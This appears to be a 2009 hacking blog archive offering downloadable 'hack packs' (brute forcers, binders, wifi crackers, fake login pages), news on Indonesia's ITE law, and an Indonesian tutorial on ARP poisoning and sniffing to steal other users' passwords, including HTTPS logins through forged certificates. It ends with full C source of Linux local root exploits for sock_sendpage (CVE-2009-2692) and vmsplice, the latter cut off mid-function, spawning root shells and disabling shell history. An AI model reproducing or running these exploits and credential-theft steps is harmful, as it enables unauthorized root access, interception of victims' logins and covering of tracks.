Thursday 31 December 2009

140 Amazing Hacks For your PC


140 Amazing Hacks For your PC!(6MB)

Some of the hacks which this article contains are:
How to call your friends with their own number Extreme Hack
How to Hack a MySpace Account
how Web 2.0 Logos Are Drawn in Photoshop
Photoshop Tips and Tricks
Rapidshare Hack,No waiting for 15 mins
Shutdown Command Via Command Prompt
Talk 2Desktop
VODAFONE HACK FOR FREE GPRS!
Where The Saved Passwords Stores In Windows Xp & Vista - Must for hackers and Beginers
Windows Genuine Hack – 100 percent Works
Wireless Hacking
Call Anywhere in the World From PC to Mobile For Free 100% Working Hack Using Skype and Yahoo Messanger Full Tutorial
Chat with Friends through ms dos Command Prompt
Create Your Own Instant Messenger Bot'
Format A HDD With Notepad
Free Calling to Any US Phone From Your iPhone
Google Hacking
And several more...

Free Download:
1. Rapidshare
2. Password: www.dl4all.com

Ultra Hacker 155 in 1


155 Hack Tools All in One:
Anon FTP
BMP Ripper
CIA 10
FTP BR
Hack the game
Brutus
Genxe
AsPack 21
Hack flash template
Hydra
Hack My space
Blaster W32
and more...

Note: these are hack tools and may be detected as viruses/spyware by antivirus/spyware programs. Use at your own risk.


Free Download:

1. Rapidshare

Full Hack Pack 2009 [Exclusive]


New Hacking Tool-s 2009 for Georgia Hacking Community

Download
1. Hotfile

Wednesday 30 December 2009

Wifi Hacks 2009 AIO


Wifi Hacks 2009 AIO | 128 MB

This tool has many different tools to hack and crack wifi so you can use your neighbours internet and do whatever. Tools for Windows and Linux also some nice extra tools!
* Aircrack
* Wireshark
* Ettercap
* Netstumbler
* Airsnare
* WIFIfofum
* Wdriver
* and much more...

Linux Hacks:
* Airpwn
* WEPcrack
* Prismstumbler
* WIFIscanner
* Airfart
* Magicmap
* WPA-cracker
* Wellenreiter
* and much more..

Free Download
1. Hotfile

Wireless Hack Toolz 2009


Wireless Hack Toolz 2009 AIO

1.NetStumbler-0.4.0
2.Kismet-2005-08-R
3.Wellenreiter-v1.9
4.WEP 0.1.0
5.Airsnort-0.2.7e
6.Wepwedgie-0.1.0-alpha
7.Hotspotter-0.4

Free Download:
1. Rapidshare

Dangerous Hack Tool 2010


The Most Dangerous Hack Tool 2010

Binders
- Daemon Crypt Public v2
- NT Packer v2.1
- EES binder v1.0
- File Injector v3
- Bytes Adder
- FreshBind v2.01
- YAB v2.01
- NakedBind v1.0
- Amok Joiner


Brute Forcers

- Munga Bunga ’s Official
- Brutus - Authentication Engine Test 2
- wwwHack v1.946
- FTP Brute Hacker
- FTP Brute Forcer.tar.gz - Unix
- Wbrute.tar.gz - Unix
- Shadow Scanner-Brute Forcer
- Hackers Utility v1.5
- POP3 brute forcer.tar.gz - Unix

CGI-Bug Scanners
- NStealth HTTP Security Scanner v5.8
- Attack Toolkit v4.1 & source code included
- Scanarator
- Legion NetBios Scanner v2.1
- NetView v1.0
- CGI Vulnerability Scan
- CGI Scanner v4.0
- VoidEye CGI scanner
and much more....

EXTRA!
- Telnet Tutorial

Download link:
1. Hotfile
2. Password: crazy-coderz.net

Tuesday 29 December 2009

KingCripts Hacking Pack

AIO | KingCripts Hacking Pack (Legionares™) | 35.97 MB



Download Links: NO MIRROR PLEASE


1. Download Link: Depositfiles (US, DE, ES, UK, FR, RU, IT, CA, PT, NL, BE)
Download from DepositFiles

1. Download Link for other Countries:
Download it from HotFile

ESET Nod32 Keys Finder V7



What's New In V.7 :-
- NodLogin updated to version V10c
- TNod User & Password Finder updated to V1.3 (F!NAL)
- New Sites For Nod Keys added
- Portable Versions - Installation not needed!

Download:
1. Hotfile
2. Rapidshare

A.I.O USB Utilities Tools

A.I.O USB Utilities Tools 2010 V2 (Size: 38,2 MB)

All Software are latest versions
Flash Boot V1.4
USB Disk Security 5
USB Trace
Win SETUP From USB 1.1
Urescue
USB Firewall 1.1.3
USB Stick Locker
USB AntiVirus 2.3
USB Disk Eject

Download
1.Hotfile
2. Rapidshare

Hacking Tools - 85 in 1




Audio-theme: Sean Paul - Temperature

Main page:
- HOTMAIL HACKING
- YAHOO HACKING
- MSN FUN TOOLS
- FAKE SCREENS/PAGES
- OTHER HACKING TOOLS
- FUN TOOLS


Donwload Free:

1. USA, EU and Russia
Download here
2. Other countries:
Download here

Monday 28 December 2009

Metasploit Framework

The Metasploit Project is ostensibly a group formed to "provide useful information to people who perform penetration testing, IDS signature development, and exploit research."

Their latest release, the Metasploit Framework version 2.0, claims to be "an advanced open-source platform for developing, testing, and using exploit code."

While it is true that the tools and functionality built in to the Metasploit Framework might prove valuable for a security auditor or penetration tester to use in verifying the security of a system or network, it is probably as true or more so that script-kiddies and other wannabe hackers or developers of malicious code might put this tool to use as an express lane or fast track to help them create exploits and malware.

I don't really know enough about the Metasploit Project or the developers who have worked on this utility to say whether their motives were pure. It seems that often the line between providing network security and breaking network security is a thin one and it doesn't take much for some otherwise rational people to accuse security researchers or administrators of less than honorable intentions. Some presume that anyone in network security is also a hacker on the side and many question the true intent of tools which double as powerful weapons for script-kiddies.

Even if we assume that their goal truly is to provide useful information and tools to help further the cause of development and security research, it doesn't change the fact that the tool is available for all to download and there is no way to predict or control what the end user will do with it.

The Metasploit Project says that their Metasploit Framework can be compared with expensive commercial products such as Immunity's CANVAS or Core Security Technology's Core Impact. These tools also provide the same or similar functionality. One of the main reasons that they have not come under the scrutiny that the Metasploit Framework has is the pricetag. Since few can afford these packages they pose little risk, but if you take that same power and distribute it freely there is a greater concern that the wrong people will use it for the wrong reasons.

The Metasploit Framework seems to be a powerful tool. I downloaded a copy myself to play with- on my own network against my lab computers. I think that for security administrators it may prove valuable in the battle to ensure your computer and network security and make sure you are protected. But, I think we may also start to see new exploits and malware hitting the streets once the script-kiddies start playing with this tool and learning just how powerful it can be as a weapon.

Download Free:
1. Metasploit For Windows
2. Metasploit For Linux

Network Spy 2.0

Network Spy is a general purpose diagnostic tool for administrators, programmers and students of network technologies. It can operate in different modes depending on the application. Some of the more typical applications of this tool include:

1. Packet capture and decode
2. Network Statistics gathering
3. Software debugging
4. Intrusion Detection and activity monitoring

Packet Capture and Decode
In this mode, Network Spy can be used to get a snapshot of data from an ethernet network. It is capable of decoding the most widely used IP protocols such as UCP, TCP and ICMP. It also allows you to save this data for later analysis. The decoded packets are displayed in human readable form.
Network Statistics gathering
In this mode, the amount of data attributed to a certain activity can be captured. For instance, if you want to monitor how much data is transferred between user x and excite.com, you can specify a rule to keep a track of amount of this data. Another example is keeping track of how much FTP data flows on your network.
Software Debugging
People programming network software and web applications will find this tool extremely useful. It can be used to debug application to find errors in code, compute bandwidth utilization and find bottlenecks.
Intrusion Detection and Activity Monitoring
Using the new rules-based filtering mechanism, one can capture packets of interest, avoiding a huge capture of all packets on the network. A rule specifies a pattern to match. For instance, one could specify to capture all ICMP packets where TTL=1. This would be true when someone is performing a traceroute. Similarly, you could specify a rule to capture all TCP packets where destination port is 23 and the SYN flag is true to find out how see how many telnet connections are being established.

Network Spy also includes various other tools such as DNS Lookup, Ping, TraceRoute and Whois to aid in everyday tasks.


Other Features

* No bloat software, small and fast executables.
* Easy installation (requires no reboot) and uninstall.
* Dynamically loaded drivers at runtime.
* Simple user-interface.
* View network traffic in realtime.
* Capture packets on a remote network.


System Requirements

* Windows 95/98/NT/2000/XP.
* An Ethernet Adapter (MS Dialup Adapters are not supported).


Download now!

You may download Network Spy and evaluate it. The evaluation version of Network Spy is restricted to 3 minutes of capture at a time.

Download : netspy.exe (545 KB)

Sunday 27 December 2009

"UU ITE Bermasalah di Penerapan"

VIVAnews- Ketua Mahkamah Konsitusi (MK) Mahfud MD menegaskan lembaga yang dia pimpin tidak mempunyai wewenang untuk menghapus Undang-Undang Informasi dan Transaksi Elektronik (ITE).

"Kalau mau menghapus undang-undang itu inisiatif politik," kata Mahfud, Selasa 22 Desember 2009. Dia menegaskan lembaga yang berwenang untuk menghapus undang-undang adalah lembaga legislatif bukan Mahkamah Konstitusi.

Hal ini menanggapi sejumlah persoalan hukum yang dikaitkan dengan UU ITE, diantaranya gugatan Rumah Sakit Omni International terhadap Prita Mulyasari dan gugatan pekerja infotainment melawan artis Luna Maya.

MK, kata dia, hanya berwenang bila undang-undang yang bersangkutan bertentangan dengan UUD 1945. "UU itu kan tidak bertentangan," tambahnya.

Demikian pula dengan persoalan boleh atau tidaknya suatu undang-undang berlaku. Mahfud mengatakan hal itu juga bukan porsi MK. "Itu legal policy dari pemerintah dan DPR," kata di kantornya.

Alternatif lainnya, sambungnya, Menteri Hukum dan HAM, Patrialis Akbar, bisa juga berinisiatif. "Membuat rancangan undang-undang untuk menggantikan itu," kata dia menjelaskan. "Itu kalau dia mau," sambung Mahfud.

Lebih lanjut Mahfud menjelaskan undang-undang yang digunakan untuk menjerat Prita Mulyasari itu pernah diuji materiilkan di Mahkamah Konsitusi. Permohonan ini ditolak karena argumentasi lahirnya UU ITE dinilai kuat dan konstitusional. "Kalau mau dihapus bisa, tapi bukan MK yang menyatakan," kata dia.

Menurut Mahfud, pasal pencemaran nama baik yang tercantum dalam UU ITE sudah benar. "Yang jadi masalah penerapannya," katanya. Sekarang ini, dia menilai hak warga harus dilindungi, termasuk dari pesan layanan singkat (SMS) liar. "Juga untuk menjaga agar orang tidak membuat sms liar," kata Mahfud memberi contoh.

Tifatul: UU ITE Miliki Beberapa Kejanggalan


VIVAnews - Pemerintah menyatakan Undang-Undang Informasi dan Transaksi Elektronik (UU ITE) bisa direvisi. Menteri Komunikasi dan Informatika, Tifatul Sembiring, mengatakan UU ITE memang memiliki beberapa kejanggalan.

Tifatul mengatakan akan mengumpulkan beberapa hal yang dalam UU ITE itu dianggap bermasalah. "Kita kumpulkan dulu tentang ini," katanya di kantor Menteri Koordinator Perekonomian, Jakarta, Rabu 23 Desember 2009.

Tifatul sendiri misalnya melihat tentang pasal masalah penghinaan hukuman yang ada seharusnya 6 bulan. Tapi dalam pasal dikenakan 6 tahun.

Sebelumnya Ketua Mahkamah Konsitusi (MK) Mahfud MD menegaskan lembaga yang dia pimpin tidak mempunyai wewenang untuk menghapus Undang-Undang Informasi dan Transaksi Elektronik (ITE).

"Kalau mau menghapus undang-undang itu inisiatif politik," kata Mahfud, Selasa 22 Desember 2009. Dia menegaskan lembaga yang berwenang untuk menghapus undang-undang adalah lembaga legislatif bukan Mahkamah Konstitusi.

Hal ini menanggapi sejumlah persoalan hukum yang dikaitkan dengan UU ITE, diantaranya gugatan Rumah Sakit Omni International terhadap Prita Mulyasari dan gugatan pekerja infotainment melawan artis Luna Maya.

Friday 25 December 2009

Tutorial LAN Hacking (Newbie)

Pertama-tama sorry kalo repost karena teknik ini bukanlah teknik yang fresh di world hacking tapi teknik ini belum basi karena sampai saat ini masih dapat digunakan karena sebagian besar jaringan meggunakan jaringan hub & switch yang tidak terenkripsi.
Mengapa tidak terenkripsi?
* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program,
bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet yang sudah
lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsi

Hacking ini menggunakan teknik:
* Sniffing
* ARP Poison Routing

Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.
Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda

Kelebihan:
* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya
terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free

Kekurangan:
* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan
termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya

Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:
* Komputer Korban
* Komputer Hacker
* Server

Perbedaan-perbedaan antara jaringan switch dan jaringan hub:

Langkah-langkah pertama:

1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di
jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:
http://www.wireshark.org/download.html
http://www.oxid.it/cain.html

Cara Menggunakan WireShark:
* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan,
bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama
anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada
komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik
“Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan
caranya karena saya tidak bisa :D)
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban
ke website dan sebaliknya

Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.

Cara Menggunakan Cain&Abel:
* Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark,
tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan
anda menggunakan program wireshark
* Buka program Cain anda
* Klik pada bagian configure
* Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
* Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password
fields nya apabila yang anda inginkan tidak ada di daftar.
Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
* Setelah itu apply settingannya dan klik ok
* Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
* Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
* Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
* Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
* Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
* Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
* Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
* Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
* Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.

Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.

Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)

Untuk istilah-istilah yang tidak ngerti bisa dicari di wikipedia (tapi yang inggris ya kalo yang indo jg belum tentu ada).

Additional Material:

Buat yang udah bisa APRKalo mau curi pass via HTTPS ini caranya (contohnya klik bca, blm pernah g coba beneran cuma baca dari buku):

* Aktifkan APR pada komputer korban
* Saat korban masuk ke klikbca APR secara otomatis akan membuat certificate palsu sehingga data yang akan ditransmisikan menjadi tidak terenkripsi lagi (ini akan menyebabkan tambah banyaknya certificate warning di komputer korban, tetapi kalo dia tidak begitu memperhatikan pasti tidak ketahuan)
* Certificate palsu itu akan terlihat di field https pada program Cain anda
* Setelah korban melakukan login lihatlah log pada bagian https dan klik kanan pilih view
* Dari data tersebut anda dapat mengetahui login password korban (coba cari2 sendiri pasti ketemu).
Silakan dicoba, kalo berhasil jgn lupa share di sini ya… :D

Thursday 24 December 2009

Nessus

In typical operation, Nessus begins by doing a port scan with one of its four internal portscanners (or it can optionally use Amap or Nmap to determine which ports are open on the target and then tries various exploits on the open ports. The vulnerability tests, available as subscriptions, are written in NASL (Nessus Attack Scripting Language), a scripting language optimized for custom network interaction.

Tenable Network Security produces several dozen new vulnerability checks (called plugins) each week, usually on a daily basis. These checks are available for free to the general public; commercial customers are not allowed to use this Home Feed any more. The Professional Feed (which is not free) also give access to support and additional scripts (audit and compliance tests...).

Optionally, the results of the scan can be reported in various formats, such as plain text, XML, HTML and LaTeX. The results can also be saved in a knowledge base for debugging. On UNIX, scanning can be automated through the use of a command-line client. There exist many different commercial, free and open source tools for both UNIX and Windows to manage individual or distributed Nessus scanners.

If the user chooses to do so (by disabling the option 'safe checks'), some of Nessus's vulnerability tests may try to cause vulnerable services or operating systems to crash. This lets a user test the resistance of a device before putting it in production.

Nessus provides additional functionality beyond testing for known network vulnerabilities. For instance, it can use Windows credentials to examine patch levels on computers running the Windows operating system, and can perform password auditing using dictionary and brute force methods. Nessus 3 and later can also audit systems to make sure they have been configured per a specific policy, such as the NSA's guide for hardening Windows servers.

The "Nessus" Project was started by Renaud Deraison in 1998 to provide to the Internet community a free remote security scanner. On October 5, 2005, Tenable Network Security, the company Renaud Deraison co-founded, changed Nessus 3 to a proprietary (closed source) license. The Nessus 3 engine is still free of charge, though Tenable charges $100/month per scanner for the ability to perform configuration audits for PCI, CIS, FDCC and other configuration standards, technical support, SCADA vulnerability audits, the latest network checks and patch audits, the ability to audit anti-virus configurations and the ability for Nessus to perform sensitive data searches to look for credit card, social security number and many other types of corporate data.

In July of 2008, Tenable sent out a revision of the feed license which will allow home users full access to plugin feeds.[5] A professional license is available for commercial use.

The Nessus 2 engine and a minority of the plugins are still GPL, leading to forked open source projects based on Nessus like OpenVAS and Porz-Wahn.Tenable Network Security has still maintained the Nessus 2 engine and has updated it several times since the release of Nessus 3.

Nessus 3 is available for many different UNIX and Windows systems, offers patch auditing of UNIX and Windows hosts without the need for an agent and is 2-5 times faster than Nessus 2.

Download Nessus Free:
1. Nessus For Windows
2. Nessus For Linux

Linux sock_sendpage

/*
* Linux sock_sendpage() NULL pointer dereference
* Copyright 2009 Ramon de Carvalho Valle
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/

/*
* This exploit was written to illustrate the exploitability of this
* vulnerability[1], discovered by Tavis Ormandy and Julien Tinnes, on ppc
* and ppc64.
*
* This exploit makes use of the SELinux and the mmap_min_addr problem to
* exploit this vulnerability on Red Hat Enterprise Linux 5.3 and CentOS 5.3.
* The problem, first noticed by Brad Spengler, was described by Red Hat in
* Red Hat Knowledgebase article: Security-Enhanced Linux (SELinux) policy and
* the mmap_min_addr protection[2].
*
* Support for i386 and x86_64 was added for completeness. For a more complete
* implementation, refer to Brad Spengler's exploit[3], which also implements
* the personality trick[4] published by Tavis Ormandy and Julien Tinnes.
*
* Linux kernel versions from 2.4.4 to 2.4.37.4, and from 2.6.0 to 2.6.30.4
* are vulnerable.
*
* This exploit was tested on:
*
* CentOS 5.3 (2.6.18-128.7.1.el5) is not vulnerable
* CentOS 5.3 (2.6.18-128.4.1.el5)
* CentOS 5.3 (2.6.18-128.2.1.el5)
* CentOS 5.3 (2.6.18-128.1.16.el5)
* CentOS 5.3 (2.6.18-128.1.14.el5)
* CentOS 5.3 (2.6.18-128.1.10.el5)
* CentOS 5.3 (2.6.18-128.1.6.el5)
* CentOS 5.3 (2.6.18-128.1.1.el5)
* CentOS 5.3 (2.6.18-128.el5)
* CentOS 4.8 (2.6.9-89.0.9.EL) is not vulnerable
* CentOS 4.8 (2.6.9-89.0.7.EL)
* CentOS 4.8 (2.6.9-89.0.3.EL)
* CentOS 4.8 (2.6.9-89.EL)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.7.1.el5) is not vulnerable
* Red Hat Enterprise Linux 5.3 (2.6.18-128.4.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.2.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.16.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.14.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.10.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.6.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.el5)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.9.EL) is not vulnerable
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.7.EL)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.3.EL)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.EL)
* SUSE Linux Enterprise Server 11 (2.6.27.19-5)
* SUSE Linux Enterprise Server 10 SP2 (2.6.16.60-0.21)
* Ubuntu 8.10 (2.6.27-14) is not vulnerable
* Ubuntu 8.10 (2.6.27-11)
* Ubuntu 8.10 (2.6.27-9)
* Ubuntu 8.10 (2.6.27-7)
*
* For i386 and ppc, compile with the following command:
* gcc -Wall -o linux-sendpage linux-sendpage.c
*
* And for x86_64 and ppc64:
* gcc -Wall -m64 -o linux-sendpage linux-sendpage.c
*
* [1] http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html
* [2] http://kbase.redhat.com/faq/docs/DOC-18042
* [3] http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz
* [4] http://blog.cr0.org/2009/06/bypassing-linux-null-pointer.html
*/

View All

Wednesday 23 December 2009

Linux kernel 2.4/2.6

/*
**
** 0x82-CVE-2009-2692
** Linux kernel 2.4/2.6 (32bit) sock_sendpage() local ring0 root exploit (simple ver)
** Tested RedHat Linux 9.0, Fedora core 4~11, Whitebox 4, CentOS 4.x.
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** spender and venglin's code is very excellent.
** Thankful to them.
**
** Greets: Brad Spengler ,
** Przemyslaw Frasunek .
** --
** exploit by .
**
** "Slow and dirty exploit for this one"
**
*/

#include
#include
#include
#include
#include
#include

unsigned int uid, gid;

void kernel_code()
{
unsigned long where=0;
unsigned long *pcb_task_struct;

where=(unsigned long )&where;
where&=~8191;
pcb_task_struct=(unsigned long *)where;

while(pcb_task_struct){
if(pcb_task_struct[0]==uid&&pcb_task_struct[1]==uid&&
pcb_task_struct[2]==uid&&pcb_task_struct[3]==uid&&
pcb_task_struct[4]==gid&&pcb_task_struct[5]==gid&&
pcb_task_struct[6]==gid&&pcb_task_struct[7]==gid){
pcb_task_struct[0]=pcb_task_struct[1]=pcb_task_struct[2]=pcb_task_struct[3]=0;
pcb_task_struct[4]=pcb_task_struct[5]=pcb_task_struct[6]=pcb_task_struct[7]=0;
break;
}
pcb_task_struct++;
}
return;
/*
** By calling iret after pushing a register into kernel stack,
** We don't have to go back to ring3(user mode) privilege level. dont worry. :-}
**
** kernel_code() function will return to its previous status which means before sendfile() system call,
** after operating upon a ring0(kernel mode) privilege level.
** This will enhance the viablity of the attack code even though each kernel can have different CS and DS address.
*/
}
void *kernel=kernel_code;

int main(int argc,char *argv[])
{
int fd_in=0,fd_out=0,offset=1;
void *zero_page;

uid=getuid();
gid=getgid();
if(uid==0){
fprintf(stderr,"[-] check ur uid\n");
return -1;
}

/*
** There are some cases that we need mprotect due to the dependency matter with SVR4. (however, I did not confirm it yet)
*/
if(personality(0xffffffff)==PER_SVR4){
if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
perror("[-] mprotect()");
return -1;
}
}
else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
perror("[-] mmap()");
return -1;
}
*(char *)0x00000000=0xff;
*(char *)0x00000001=0x25;
*(unsigned long *)0x00000002=(unsigned long)&kernel;
*(char *)0x00000006=0xc3;

if((fd_in=open(argv[0],O_RDONLY))==-1){
perror("[-] open()");
return -1;
}
if((fd_out=socket(PF_APPLETALK,SOCK_DGRAM,0))==-1){
if((fd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0))==-1){
perror("[-] socket()");
return -1;
}
}
gogossing:
/*
** Sometimes, the attacks can fail. To enlarge the possiblilty of attack,
** an attacker can make all the processes runing under current user uid 0.
*/
if(sendfile(fd_out,fd_in,&offset,2)==-1){
if(offset==0){
perror("[-] sendfile()");
return -1;
}
close(fd_out);
fd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0);
}
if(getuid()==uid){
if(offset){
offset=0;
}
goto gogossing; /* all process */
}
close(fd_in);
close(fd_out);

execl("/bin/sh","sh","-i",NULL);
return 0;
}

/* eoc */

Tuesday 22 December 2009

Kernel 2.6.17

/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.17 - 2.6.24.1
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remeber original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include

#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void kernel_code()
{
int i;
uint *p = get_current();

for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}

exit_kernel();
}

void exit_code()
{
if (getuid() != 0)
die("wtf", 0);

printf("[+] root\n");
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
